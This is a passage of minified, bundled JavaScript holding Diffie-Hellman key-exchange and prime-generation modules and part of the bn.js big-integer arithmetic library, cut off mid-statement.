O?U.toString(O):U}Object.defineProperty(w.prototype,"verifyError",{enumerable:!0,get:function(){return"number"!=typeof this._primeCode&&(this._primeCode=function D(S,O){var U=O.toString("hex"),K=[U,S.toString(16)].join("_");if(K in p)return p[K];var se,ee=0;if(S.isEven()||!b.simpleSieve||!b.fermatTest(S)||!ae.test(S))return ee+=1,p[K]=ee+="02"===U||"05"===U?8:4,ee;switch(ae.test(S.shrn(1))||(ee+=2),U){case"02":S.mod(I).cmp(Q)&&(ee+=8);break;case"05":(se=S.mod(F)).cmp(E)&&se.cmp(g)&&(ee+=8);break;default:ee+=4}return p[K]=ee,ee}(this.__prime,this.__gen)),this._primeCode}}),w.prototype.generateKeys=function(){return this._priv||(this._priv=new j(_(this._primeLen))),this._pub=this._gen.toRed(this._prime).redPow(this._priv).fromRed(),this.getPublicKey()},w.prototype.computeSecret=function(S){var O=(S=(S=new j(S)).toRed(this._prime)).redPow(this._priv).fromRed(),U=new ie(O.toArray()),K=this.getPrime();if(U.length<K.length){var ee=new ie(K.length-U.length);ee.fill(0),U=ie.concat([ee,U])}return U},w.prototype.getPublicKey=function(O){return x(this._pub,O)},w.prototype.getPrivateKey=function(O){return x(this._priv,O)},w.prototype.getPrime=function(S){return x(this.__prime,S)},w.prototype.getGenerator=function(S){return x(this._gen,S)},w.prototype.setGenerator=function(S,O){return O=O||"utf8",ie.isBuffer(S)||(S=new ie(S,O)),this.__gen=S,this._gen=new j(S),this}},3193:(Pe,we,de)=>{var ie=de(2419);Pe.exports=K,K.simpleSieve=O,K.fermatTest=U;var j=de(4424),$=new j(24),I=new(de(2465)),Q=new j(1),F=new j(2),E=new j(5),_=(new j(16),new j(8),new j(10)),y=new j(3),p=(new j(7),new j(11)),D=new j(4),x=(new j(12),null);function O(ee){for(var se=function S(){if(null!==x)return x;var se=[];se[0]=2;for(var ve=1,le=3;le<1048576;le+=2){for(var ye=Math.ceil(Math.sqrt(le)),z=0;z<ve&&se[z]<=ye&&le%se[z]!=0;z++);ve!==z&&se[z]<=ye||(se[ve++]=le)}return x=se,se}(),ve=0;ve<se.length;ve++)if(0===ee.modn(se[ve]))return 0===ee.cmpn(se[ve]);return!0}function U(ee){var se=j.mont(ee);return 0===F.toRed(se).redPow(ee.subn(1)).fromRed().cmpn(1)}function K(ee,se){if(ee<16)return new j(2===se||5===se?[140,123]:[140,39]);se=new j(se);for(var ve,le;;){for(ve=new j(ie(Math.ceil(ee/8)));ve.bitLength()>ee;)ve.ishrn(1);if(ve.isEven()&&ve.iadd(Q),ve.testn(1)||ve.iadd(F),se.cmp(F)){if(!se.cmp(E))for(;ve.mod(_).cmp(y);)ve.iadd(D)}else for(;ve.mod($).cmp(p);)ve.iadd(D);if(O(le=ve.shrn(1))&&O(ve)&&U(le)&&U(ve)&&I.test(le)&&I.test(ve))return ve}}},4424:function(Pe,we,de){!function(ie,j){"use strict";function $(z,l){if(!z)throw new Error(l||"Assertion failed")}function ae(z,l){z.super_=l;var f=function(){};f.prototype=l.prototype,z.prototype=new f,z.prototype.constructor=z}function I(z,l,f){if(I.isBN(z))return z;this.negative=0,this.words=null,this.length=0,this.red=null,null!==z&&(("le"===l||"be"===l)&&(f=l,l=10),this._init(z||0,l||10,f||"be"))}var Q;"object"==typeof ie?ie.exports=I:j.BN=I,I.BN=I,I.wordSize=26;try{Q="undefined"!=typeof window&&void 0!==window.Buffer?window.Buffer:de(7748).Buffer}catch(z){}function F(z,l){var f=z.charCodeAt(l);return f>=65&&f<=70?f-55:f>=97&&f<=102?f-87:f-48&15}function E(z,l,f){var A=F(z,f);return f-1>=l&&(A|=F(z,f-1)<<4),A}function g(z,l,f,A){for(var v=0,P=Math.min(z.length,f),G=l;G<P;G++){var X=z.charCodeAt(G)-48;v*=A,v+=X>=49?X-49+10:X>=17?X-17+10:X}return v}I.isBN=function(l){return l instanceof I||null!==l&&"object"==typeof l&&l.constructor.wordSize===I.wordSize&&Array.isArray(l.words)},I.max=function(l,f){return l.cmp(f)>0?l:f},I.min=function(l,f){return l.cmp(f)<0?l:f},I.prototype._init=function(l,f,A){if("number"==typeof l)return this._initNumber(l,f,A);if("object"==typeof l)return this._initArray(l,f,A);"hex"===f&&(f=16),$(f===(0|f)&&f>=2&&f<=36);var v=0;"-"===(l=l.toString().replace(/\s+/g,""))[0]&&(v++,this.negative=1),v<l.length&&(16===f?this._parseHex(l,v,A):(this._parseBase(l,f,v),"le"===A&&this._initArray(this.toArray(),f,A)))},I.prototype._initNumber=function(l,f,A){l<0&&(this.negative=1,l=-l),l<67108864?(this.words=[67108863&l],this.length=1):l<4503599627370496?(this.words=[67108863&l,l/67108864&67108863],this.length=2):($(l<9007199254740992),this.words=[67108863&l,l/67108864&67108863,1],this.length=3),"le"===A&&this._initArray(this.toArray(),f,A)},I.prototype._initArray=function(l,f,A){if($("number"==typeof l.length),l.length<=0)return this.words=[0],this.length=1,this;this.length=Math.ceil(l.length/3),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var P,G,X=0;if("be"===A)for(v=l.length-1,P=0;v>=0;v-=3)this.words[P]|=(G=l[v]|l[v-1]<<8|l[v-2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);else if("le"===A)for(v=0,P=0;v<l.length;v+=3)this.words[P]|=(G=l[v]|l[v+1]<<8|l[v+2]<<16)<<X&67108863,this.words[P+1]=G>>>26-X&67108863,(X+=24)>=26&&(X-=26,P++);return this.strip()},I.prototype._parseHex=function(l,f,A){this.length=Math.ceil((l.length-f)/6),this.words=new Array(this.length);for(var v=0;v<this.length;v++)this.words[v]=0;var X,P=0,G=0;if("be"===A)for(v=l.length-1;v>=f;v-=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;else for(v=(l.length-f)%2==0?f+1:f;v<l.length;v+=2)X=E(l,f,v)<<P,this.words[G]|=67108863&X,P>=18?(P-=18,this.words[G+=1]|=X>>>26):P+=8;this.strip()},I.prototype._parseBase=function(l,f,A){this.words=[0],this.length=1;for(var v=0,P=1;P<=67108863;P*=f)v++;v--,P=P/f|0;for(var G=l.length-A,X=G%v,L=Math.min(G,G-X)+A,h=0,R=A;R<L;R+=v)h=g(l,R,R+v,f),this.imuln(P),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h);if(0!==X){var J=1;for(h=g(l,R,l.length,f),R=0;R<X;R++)J*=f;this.imuln(J),this.words[0]+h<67108864?this.words[0]+=h:this._iaddn(h)}this.strip()},I.prototype.copy=function(l){l.words=new Array(this.length);for(var f=0;f<this.length;f++)l.words[f]=this.words[f];l.length=this.length,l.negative=this.negative,l.red=this.red},I.prototype.clone=function(){var l=new I(null);return this.copy(l),l},I.prototype._expand=function(l){for(;this.length<l;)this.words[this.length++]=0;return this},I.prototype.strip=function(){for(;this.length>1&&0===this.words[this.length-1];)this.length--;return this._normSign()},I.prototype._normSign=function(){return 1===this.length&&0===this.words[0]&&(this.negative=0),this},I.prototype.inspect=function(){return(this.red?"<BN-R: ":"<BN: ")+this.toString(16)+">"};var b=["","0","00","000","0000","00000","000000","0000000","00000000","000000000","0000000000","00000000000","000000000000","0000000000000","00000000000000","000000000000000","0000000000000000","00000000000000000","000000000000000000","0000000000000000000","00000000000000000000","000000000000000000000","0000000000000000000000","00000000000000000000000","000000000000000000000000","0000000000000000000000000"],_=[0,0,25,16,12,11,10,9,8,8,7,7,7,7,6,6,6,6,6,6,6,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5,5],y=[0,0,33554432,43046721,16777216,48828125,60466176,40353607,16777216,43046721,1e7,19487171,35831808,62748517,7529536,11390625,16777216,24137569,34012224,47045881,64e6,4084101,5153632,6436343,7962624,9765625,11881376,14348907,17210368,20511149,243e5,28629151,33554432,39135393,45435424,52521875,60466176];function p(z,l,f){f.negative=l.negative^z.negative;var A=z.length+l.length|0;f.length=A,A=A-1|0;var v=0|z.words[0],P=0|l.words[0],G=v*P,L=G/67108864|0;f.words[0]=67108863&G;for(var h=1;h<A;h++){for(var R=L>>>26,J=67108863&L,Z=Math.min(h,l.length-1),ue=Math.max(0,h-z.length+1);ue<=Z;ue++)R+=(G=(v=0|z.words[h-ue|0])*(P=0|l.words[ue])+J)/67108864|0,J=67108863&G;f.words[h]=0|J,L=0|R}return 0!==L?f.words[h]=0|L:f.length--,f.strip()}I.prototype.toString=function(l,f){var A;if(f=0|f||1,16===(l=l||10)||"hex"===l){A="";for(var v=0,P=0,G=0;G<this.length;G++){var X=this.words[G],L=(16777215&(X<<v|P)).toString(16);A=0!=(P=X>>>24-v&16777215)||G!==this.length-1?b[6-L.length]+L+A:L+A,(v+=2)>=26&&(v-=26,G--)}for(0!==P&&(A=P.toString(16)+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}if(l===(0|l)&&l>=2&&l<=36){var h=_[l],R=y[l];A="";var J=this.clone();for(J.negative=0;!J.isZero();){var Z=J.modn(R).toString(l);A=(J=J.idivn(R)).isZero()?Z+A:b[h-Z.length]+Z+A}for(this.isZero()&&(A="0"+A);A.length%f!=0;)A="0"+A;return 0!==this.negative&&(A="-"+A),A}$(!1,"Base should be between 2 and 36")},I.prototype.toNumber=function(){var l=this.words[0];return 2===this.length?l+=67108864*this.words[1]:3===this.length&&1===this.words[2]?l+=4503599627370496+67108864*this.words[1]:this.length>2&&$(!1,"Number can only safely store up to 53 bits"),0!==this.negative?-l:l},I.prototype.toJSON=function(){return this.toString(16)},I.prototype.toBuffer=function(l,f){return $(void 0!==Q),this.toArrayLike(Q,l,f)},I.prototype.toArray=function(l,f){return this.toArrayLike(Array,l,f)},I.prototype.toArrayLike=function(l,f,A){var v=this.byteLength(),P=A||Math.max(1,v);$(v<=P,"byte array longer than desired length"),$(P>0,"Requested array length <= 0"),this.strip();var L,h,G="le"===f,X=new l(P),R=this.clone();if(G){for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[h]=L;for(;h<P;h++)X[h]=0}else{for(h=0;h<P-v;h++)X[h]=0;for(h=0;!R.isZero();h++)L=R.andln(255),R.iushrn(8),X[P-h-1]=L}return X},I.prototype._countBits=Math.clz32?function(l){return 32-Math.clz32(l)}:function(l){var f=l,A=0;return f>=4096&&(A+=13,f>>>=13),f>=64&&(A+=7,f>>>=7),f>=8&&(A+=4,f>>>=4),f>=2&&(A+=2,f>>>=2),A+f},I.prototype._zeroBits=function(l){if(0===l)return 26;var f=l,A=0;return 0==(8191&f)&&(A+=13,f>>>=13),0==(127&f)&&(A+=7,f>>>=7),0==(15&f)&&(A+=4,f>>>=4),0==(3&f)&&(A+=2,f>>>=2),0==(1&f)&&A++,A},I.prototype.bitLength=function(){var f=this._countBits(this.words[this.length-1]);return 26*(this.length-1)+f},I.prototype.zeroBits=function(){if(this.isZero())return 0;for(var l=0,f=0;f<this.length;f++){var A=this._zeroBits(this.words[f]);if(l+=A,26!==A)break}return l},I.prototype.byteLength=function(){return Math.ceil(this.bitLength()/8)},I.prototype.toTwos=function(l){return 0!==this.negative?this.abs().inotn(l).iaddn(1):this.clone()},I.prototype.fromTwos=function(l){return this.testn(l-1)?this.notn(l).iaddn(1).ineg():this.clone()},I.prototype.isNeg=function(){return 0!==this.negative},I.prototype.neg=function(){return this.clone().ineg()},I.prototype.ineg=function(){return this.isZero()||(this.negative^=1),this},I.prototype.iuor=function(l){for(;this.length<l.length;)this.words[this.length++]=0;for(var f=0;f<l.length;f++)this.words[f]=this.words[f]|l.words[f];return this.strip()},I.prototype.ior=function(l){return $(0==(this.negative|l.negative)),this.iuor(l)},I.prototype.or=function(l){return this.length>l.length?this.clone().ior(l):l.clone().ior(this)},I.prototype.uor=function(l){return this.length>l.length?this.clone().iuor(l):l.clone().iuor(this)},I.prototype.iuand=function(l){var f;f=this.length>l.length?l:this;for(var A=0;A<f.length;A++)this.words[A]=this.words[A]&l.words[A];return this.length=f.length,this.strip()},I.prototype.iand=function(l){return $(0==(this.negative|l.negative)),this.iuand(l)},I.prototype.and=function(l){return this.length>l.length?this.clone().iand(l):l.clone().iand(this)},I.prototype.uand=function(l){return this.length>l.length?this.clone().iuand(l):l.clone().iuand(this)},I.prototype.iuxor=function(l){var f,A;this.length>l.length?(f=this,A=l):(f=l,A=this);for(var v=0;v<A.length;v++)this.words[v]=f.words[v]^A.words[v];if(this!==f)for(;v<f.length;v++)this.words[v]=f.words[v];return this.length=f.length,this.strip()},I.prototype.ixor=function(l){return $(0==(this.negative|l.negative)),this.iuxor(l)},I.prototype.xor=function(l){return this.length>l.length?this.clone().ixor(l):l.clone().ixor(this)},I.prototype.uxor=function(l){return this.length>l.length?this.clone().iuxor(l):l.clone().iuxor(this)},I.prototype.inotn=function(l){$("number"==typeof l&&l>=0);var f=0|Math.ceil(l/26),A=l%26;this._expand(f),A>0&&f--;for(var v=0;v<f;v++)this.words[v]=67108863&~this.words[v];return A>0&&(this.words[v]=~this.words[v]&67108863>>26-A),this.strip()},I.prototype.notn=function(l){return this.clone().inotn(l)},I.prototype.setn=function(l,f){$("number"==typeof l&&l>=0);var A=l/26|0,v=l%26;return this._expand(A+1),this.words[A]=f?this.words[A]|1<<v:this.words[A]&~(1<<v),this.strip()},I.prototype.iadd=function(l){var f,A,v;if(0!==this.negative&&0===l.negative)return this.negative=0,f=this.isub(l),this.negative^=1,this._normSign();if(0===this.negative&&0!==l.negative)return l.negative=0,f=this.isub(l),l.negative=1,f._normSign();this.length>l.length?(A=this,v=l):(A=l,v=this);for(var P=0,G=0;G<v.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+(0|v.words[G])+P),P=f>>>26;for(;0!==P&&G<A.length;G++)this.words[G]=67108863&(f=(0|A.words[G])+P),P=f>>>26;if(this.length=A.length,0!==P)this.words[this.length]=P,this.length++;else if(A!==this)for(;G<A.length;G++)this.words[G]=A.words[G];return this},I.prototype.add=function(l){var f;return 0!==l.negative&&0===this.negative?(l.negative=0,f=this.sub(l),l.negative^=1,f):0===l.negative&&0!==this.negative?(this.negative=0,f=l.sub(this),this.negative=1,f):this.length>l.length?this.clone().iadd(l):l.clone().iadd(this)},I.prototype.isub=function(l){if(0!==l.negative){l.negative=0;var f=this.iadd(l);return l.negative=1,f._normSign()}if(0!==this.negative)return this.negative=0,this.iadd(l),this.negative=1,this._normSign();var v,P,A=this.cmp(l);if(0===A)return this.negative=0,this.length=1,this.words[0]=0,this;A>0?(v=this,P=l):(v=l,P=this);for(var G=0,X=0;X<P.length;X++)G=(f=(0|v.words[X])-(0|P.words[X])+G)>>26,this.words[X]=67108863&f;for(;0!==G&&X<v.length;X++)G=(f=(0|v.words[X])+G)>>26,this.words[X]=67108863&f;if(0===G&&X<v.length&&v!==this)for(;X<v.length;X++)this.words[X]=v.words[X];return this.length=Math.max(this.length,X),v!==this&&(this.negative=1),this.strip()},I.prototype.sub=function(l){return this.clone().isub(l)};var D=function(l,f,A){var L,h,R,v=l.words,P=f.words,G=A.words,X=0,J=0|v[0],Z=8191&J,ue=J>>>13,Ie=0|v[1],Ae=8191&Ie,Ue=Ie>>>13,Xe=0|v[2],He=8191&Xe,Be=Xe>>>13,qe=0|v[3],De=8191&qe,Ve=qe>>>13,ze=0|v[4],me=8191&ze,Ke=ze>>>13,rt=0|v[5],Ge=8191&rt,Qe=rt>>>13,ht=0|v[6],mt=8191&ht,lt=ht>>>13,ft=0|v[7],xe=8191&ft,We=ft>>>13,Je=0|v[8],Oe=8191&Je,Te=Je>>>13,Le=0|v[9],$e=8191&Le,st=Le>>>13,xt=0|P[0],pt=8191&xt,vt=xt>>>13,Wi=0|P[1],Ft=8191&Wi,zt=Wi>>>13,pa=0|P[2],Jt=8191&pa,Gt=pa>>>13,Co=0|P[3],jt=8191&Co,qt=Co>>>13,Qn=0|P[4],Kt=8191&Qn,Zt=Qn>>>13,Bo=0|P[5],ti=8191&Bo,ii=Bo>>>13,pn=0|P[6],Pt=8191&pn,Xt=pn>>>13,Ho=0|P[7],Qt=8191&Ho,ei=Ho>>>13,$o=0|P[8],ai=8191&$o,$t=$o>>>13,zo=0|P[9],Ut=8191&zo,Yt=zo>>>13;A.negative=l.negative^f.negative,A.length=19;var ha=(X+(L=Math.imul(Z,pt))|0)+((8191&(h=(h=Math.imul(Z,vt))+Math.imul(ue,pt)|0))<<13)|0;X=((R=Math.imul(ue,vt))+(h>>>13)|0)+(ha>>>26)|0,ha&=67108863,L=Math.imul(Ae,pt),h=(h=Math.imul(Ae,vt))+Math.imul(Ue,pt)|0,R=Math.imul(Ue,vt);var Ha=(X+(L=L+Math.imul(Z,Ft)|0)|0)+((8191&(h=(h=h+Math.imul(Z,zt)|0)+Math.imul(ue,Ft)|0))<<13)|0;X=((R=R+Math.imul(ue,zt)|0)+(h>>>13)|0)+(Ha>>>26)|0,Ha&=67108863,L=Math.imul(He,pt),h=(h=Math.imul(He,vt))+Math.imul(Be,pt)|0,R=Math.imul(Be,vt),L=L+Math.imul(Ae,Ft)|0,h=(h=h+Math.imul(Ae,zt)|0)+Math.imul(Ue,Ft)|0,R=R+Math.imul(Ue,zt)|0;var Va=(X+(L=L+Math.imul(Z,Jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Gt)|0)+Math.imul(ue,Jt)|0))<<13)|0;X=((R=R+Math.imul(ue,Gt)|0)+(h>>>13)|0)+(Va>>>26)|0,Va&=67108863,L=Math.imul(De,pt),h=(h=Math.imul(De,vt))+Math.imul(Ve,pt)|0,R=Math.imul(Ve,vt),L=L+Math.imul(He,Ft)|0,h=(h=h+Math.imul(He,zt)|0)+Math.imul(Be,Ft)|0,R=R+Math.imul(Be,zt)|0,L=L+Math.imul(Ae,Jt)|0,h=(h=h+Math.imul(Ae,Gt)|0)+Math.imul(Ue,Jt)|0,R=R+Math.imul(Ue,Gt)|0;var co=(X+(L=L+Math.imul(Z,jt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,qt)|0)+Math.imul(ue,jt)|0))<<13)|0;X=((R=R+Math.imul(ue,qt)|0)+(h>>>13)|0)+(co>>>26)|0,co&=67108863,L=Math.imul(me,pt),h=(h=Math.imul(me,vt))+Math.imul(Ke,pt)|0,R=Math.imul(Ke,vt),L=L+Math.imul(De,Ft)|0,h=(h=h+Math.imul(De,zt)|0)+Math.imul(Ve,Ft)|0,R=R+Math.imul(Ve,zt)|0,L=L+Math.imul(He,Jt)|0,h=(h=h+Math.imul(He,Gt)|0)+Math.imul(Be,Jt)|0,R=R+Math.imul(Be,Gt)|0,L=L+Math.imul(Ae,jt)|0,h=(h=h+Math.imul(Ae,qt)|0)+Math.imul(Ue,jt)|0,R=R+Math.imul(Ue,qt)|0;var io=(X+(L=L+Math.imul(Z,Kt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Zt)|0)+Math.imul(ue,Kt)|0))<<13)|0;X=((R=R+Math.imul(ue,Zt)|0)+(h>>>13)|0)+(io>>>26)|0,io&=67108863,L=Math.imul(Ge,pt),h=(h=Math.imul(Ge,vt))+Math.imul(Qe,pt)|0,R=Math.imul(Qe,vt),L=L+Math.imul(me,Ft)|0,h=(h=h+Math.imul(me,zt)|0)+Math.imul(Ke,Ft)|0,R=R+Math.imul(Ke,zt)|0,L=L+Math.imul(De,Jt)|0,h=(h=h+Math.imul(De,Gt)|0)+Math.imul(Ve,Jt)|0,R=R+Math.imul(Ve,Gt)|0,L=L+Math.imul(He,jt)|0,h=(h=h+Math.imul(He,qt)|0)+Math.imul(Be,jt)|0,R=R+Math.imul(Be,qt)|0,L=L+Math.imul(Ae,Kt)|0,h=(h=h+Math.imul(Ae,Zt)|0)+Math.imul(Ue,Kt)|0,R=R+Math.imul(Ue,Zt)|0;var yo=(X+(L=L+Math.imul(Z,ti)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ii)|0)+Math.imul(ue,ti)|0))<<13)|0;X=((R=R+Math.imul(ue,ii)|0)+(h>>>13)|0)+(yo>>>26)|0,yo&=67108863,L=Math.imul(mt,pt),h=(h=Math.imul(mt,vt))+Math.imul(lt,pt)|0,R=Math.imul(lt,vt),L=L+Math.imul(Ge,Ft)|0,h=(h=h+Math.imul(Ge,zt)|0)+Math.imul(Qe,Ft)|0,R=R+Math.imul(Qe,zt)|0,L=L+Math.imul(me,Jt)|0,h=(h=h+Math.imul(me,Gt)|0)+Math.imul(Ke,Jt)|0,R=R+Math.imul(Ke,Gt)|0,L=L+Math.imul(De,jt)|0,h=(h=h+Math.imul(De,qt)|0)+Math.imul(Ve,jt)|0,R=R+Math.imul(Ve,qt)|0,L=L+Math.imul(He,Kt)|0,h=(h=h+Math.imul(He,Zt)|0)+Math.imul(Be,Kt)|0,R=R+Math.imul(Be,Zt)|0,L=L+Math.imul(Ae,ti)|0,h=(h=h+Math.imul(Ae,ii)|0)+Math.imul(Ue,ti)|0,R=R+Math.imul(Ue,ii)|0;var Vn=(X+(L=L+Math.imul(Z,Pt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Xt)|0)+Math.imul(ue,Pt)|0))<<13)|0;X=((R=R+Math.imul(ue,Xt)|0)+(h>>>13)|0)+(Vn>>>26)|0,Vn&=67108863,L=Math.imul(xe,pt),h=(h=Math.imul(xe,vt))+Math.imul(We,pt)|0,R=Math.imul(We,vt),L=L+Math.imul(mt,Ft)|0,h=(h=h+Math.imul(mt,zt)|0)+Math.imul(lt,Ft)|0,R=R+Math.imul(lt,zt)|0,L=L+Math.imul(Ge,Jt)|0,h=(h=h+Math.imul(Ge,Gt)|0)+Math.imul(Qe,Jt)|0,R=R+Math.imul(Qe,Gt)|0,L=L+Math.imul(me,jt)|0,h=(h=h+Math.imul(me,qt)|0)+Math.imul(Ke,jt)|0,R=R+Math.imul(Ke,qt)|0,L=L+Math.imul(De,Kt)|0,h=(h=h+Math.imul(De,Zt)|0)+Math.imul(Ve,Kt)|0,R=R+Math.imul(Ve,Zt)|0,L=L+Math.imul(He,ti)|0,h=(h=h+Math.imul(He,ii)|0)+Math.imul(Be,ti)|0,R=R+Math.imul(Be,ii)|0,L=L+Math.imul(Ae,Pt)|0,h=(h=h+Math.imul(Ae,Xt)|0)+Math.imul(Ue,Pt)|0,R=R+Math.imul(Ue,Xt)|0;var Eo=(X+(L=L+Math.imul(Z,Qt)|0)|0)+((8191&(h=(h=h+Math.imul(Z,ei)|0)+Math.imul(ue,Qt)|0))<<13)|0;X=((R=R+Math.imul(ue,ei)|0)+(h>>>13)|0)+(Eo>>>26)|0,Eo&=67108863,L=Math.imul(Oe,pt),h=(h=Math.imul(Oe,vt))+Math.imul(Te,pt)|0,R=Math.imul(Te,vt),L=L+Math.imul(xe,Ft)|0,h=(h=h+Math.imul(xe,zt)|0)+Math.imul(We,Ft)|0,R=R+Math.imul(We,zt)|0,L=L+Math.imul(mt,Jt)|0,h=(h=h+Math.imul(mt,Gt)|0)+Math.imul(lt,Jt)|0,R=R+Math.imul(lt,Gt)|0,L=L+Math.imul(Ge,jt)|0,h=(h=h+Math.imul(Ge,qt)|0)+Math.imul(Qe,jt)|0,R=R+Math.imul(Qe,qt)|0,L=L+Math.imul(me,Kt)|0,h=(h=h+Math.imul(me,Zt)|0)+Math.imul(Ke,Kt)|0,R=R+Math.imul(Ke,Zt)|0,L=L+Math.imul(De,ti)|0,h=(h=h+Math.imul(De,ii)|0)+Math.imul(Ve,ti)|0,R=R+Math.imul(Ve,ii)|0,L=L+Math.imul(He,Pt)|0,h=(h=h+Math.imul(He,Xt)|0)+Math.imul(Be,Pt)|0,R=R+Math.imul(Be,Xt)|0,L=L+Math.imul(Ae,Qt)|0,h=(h=h+Math.imul(Ae,ei)|0)+Math.imul(Ue,Qt)|0,R=R+Math.imul(Ue,ei)|0;var Pn=(X+(L=L+Math.imul(Z,ai)|0)|0)+((8191&(h=(h=h+Math.imul(Z,$t)|0)+Math.imul(ue,ai)|0))<<13)|0;X=((R=R+Math.imul(ue,$t)|0)+(h>>>13)|0)+(Pn>>>26)|0,Pn&=67108863,L=Math.imul($e,pt),h=(h=Math.imul($e,vt))+Math.imul(st,pt)|0,R=Math.imul(st,vt),L=L+Math.imul(Oe,Ft)|0,h=(h=h+Math.imul(Oe,zt)|0)+Math.imul(Te,Ft)|0,R=R+Math.imul(Te,zt)|0,L=L+Math.imul(xe,Jt)|0,h=(h=h+Math.imul(xe,Gt)|0)+Math.imul(We,Jt)|0,R=R+Math.imul(We,Gt)|0,L=L+Math.imul(mt,jt)|0,h=(h=h+Math.imul(mt,qt)|0)+Math.imul(lt,jt)|0,R=R+Math.imul(lt,qt)|0,L=L+Math.imul(Ge,Kt)|0,h=(h=h+Math.imul(Ge,Zt)|0)+Math.imul(Qe,Kt)|0,R=R+Math.imul(Qe,Zt)|0,L=L+Math.imul(me,ti)|0,h=(h=h+Math.imul(me,ii)|0)+Math.imul(Ke,ti)|0,R=R+Math.imul(Ke,ii)|0,L=L+Math.imul(De,Pt)|0,h=(h=h+Math.imul(De,Xt)|0)+Math.imul(Ve,Pt)|0,R=R+Math.imul(Ve,Xt)|0,L=L+Math.imul(He,Qt)|0,h=(h=h+Math.imul(He,ei)|0)+Math.imul(Be,Qt)|0,R=R+Math.imul(Be,ei)|0,L=L+Math.imul(Ae,ai)|0,h=(h=h+Math.imul(Ae,$t)|0)+Math.imul(Ue,ai)|0,R=R+Math.imul(Ue,$t)|0;var lo=(X+(L=L+Math.imul(Z,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Z,Yt)|0)+Math.imul(ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(ue,Yt)|0)+(h>>>13)|0)+(lo>>>26)|0,lo&=67108863,L=Math.imul($e,Ft),h=(h=Math.imul($e,zt))+Math.imul(st,Ft)|0,R=Math.imul(st,zt),L=L+Math.imul(Oe,Jt)|0,h=(h=h+Math.imul(Oe,Gt)|0)+Math.imul(Te,Jt)|0,R=R+Math.imul(Te,Gt)|0,L=L+Math.imul(xe,jt)|0,h=(h=h+Math.imul(xe,qt)|0)+Math.imul(We,jt)|0,R=R+Math.imul(We,qt)|0,L=L+Math.imul(mt,Kt)|0,h=(h=h+Math.imul(mt,Zt)|0)+Math.imul(lt,Kt)|0,R=R+Math.imul(lt,Zt)|0,L=L+Math.imul(Ge,ti)|0,h=(h=h+Math.imul(Ge,ii)|0)+Math.imul(Qe,ti)|0,R=R+Math.imul(Qe,ii)|0,L=L+Math.imul(me,Pt)|0,h=(h=h+Math.imul(me,Xt)|0)+Math.imul(Ke,Pt)|0,R=R+Math.imul(Ke,Xt)|0,L=L+Math.imul(De,Qt)|0,h=(h=h+Math.imul(De,ei)|0)+Math.imul(Ve,Qt)|0,R=R+Math.imul(Ve,ei)|0,L=L+Math.imul(He,ai)|0,h=(h=h+Math.imul(He,$t)|0)+Math.imul(Be,ai)|0,R=R+Math.imul(Be,$t)|0;var ao=(X+(L=L+Math.imul(Ae,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(Ae,Yt)|0)+Math.imul(Ue,Ut)|0))<<13)|0;X=((R=R+Math.imul(Ue,Yt)|0)+(h>>>13)|0)+(ao>>>26)|0,ao&=67108863,L=Math.imul($e,Jt),h=(h=Math.imul($e,Gt))+Math.imul(st,Jt)|0,R=Math.imul(st,Gt),L=L+Math.imul(Oe,jt)|0,h=(h=h+Math.imul(Oe,qt)|0)+Math.imul(Te,jt)|0,R=R+Math.imul(Te,qt)|0,L=L+Math.imul(xe,Kt)|0,h=(h=h+Math.imul(xe,Zt)|0)+Math.imul(We,Kt)|0,R=R+Math.imul(We,Zt)|0,L=L+Math.imul(mt,ti)|0,h=(h=h+Math.imul(mt,ii)|0)+Math.imul(lt,ti)|0,R=R+Math.imul(lt,ii)|0,L=L+Math.imul(Ge,Pt)|0,h=(h=h+Math.imul(Ge,Xt)|0)+Math.imul(Qe,Pt)|0,R=R+Math.imul(Qe,Xt)|0,L=L+Math.imul(me,Qt)|0,h=(h=h+Math.imul(me,ei)|0)+Math.imul(Ke,Qt)|0,R=R+Math.imul(Ke,ei)|0,L=L+Math.imul(De,ai)|0,h=(h=h+Math.imul(De,$t)|0)+Math.imul(Ve,ai)|0,R=R+Math.imul(Ve,$t)|0;var bo=(X+(L=L+Math.imul(He,Ut)|0)|0)+((8191&(h=(h=h+Math.imul(He,Yt)|0)+Math.imul(Be,Ut)|0))<<13)|0;X=((R=R+Math.imul(Be,Yt)|0)+(h>>>13)|0)+(bo>>>26)|0,bo&=67108863,L=Math.imul($e,jt),h=(h=Math.imul($e,qt))+Math.imul(st,jt)|0,R=Math.imul(st,qt),L=L+Math.imul(Oe,Kt)|0,h=(h=h+Math.imul(Oe,Zt)|0)+Math.imul(Te,Kt)|0,R=R+Math.imul(Te,Zt)|0,L=L+Math.imul(xe,ti)|0,h=(h=h+Math.imul(xe,ii)|0)+Math.imul(We,ti)|0,R=R+Math.imul(We,ii)|0,L=L+Math.imul(mt,Pt)|0,h=(h=h+Math.imul(mt,Xt)|0)+Math.imul(lt,Pt)|0,R=R+Math.imul(lt,Xt)|0,L=L+Math.imul(Ge,Qt)|0,h=(h=h+Math.imul(Ge,ei)|0)+Math.imul(Qe,Qt)|0,R=R+Math.imul(Qe,ei)|0,L=L+Math.imul(me,ai)|0,h=(h=h+Math.imul(me,$t)|0)+Math.imul(Ke,ai)|0,R=R+Math.imul(Ke,$t)|0;var 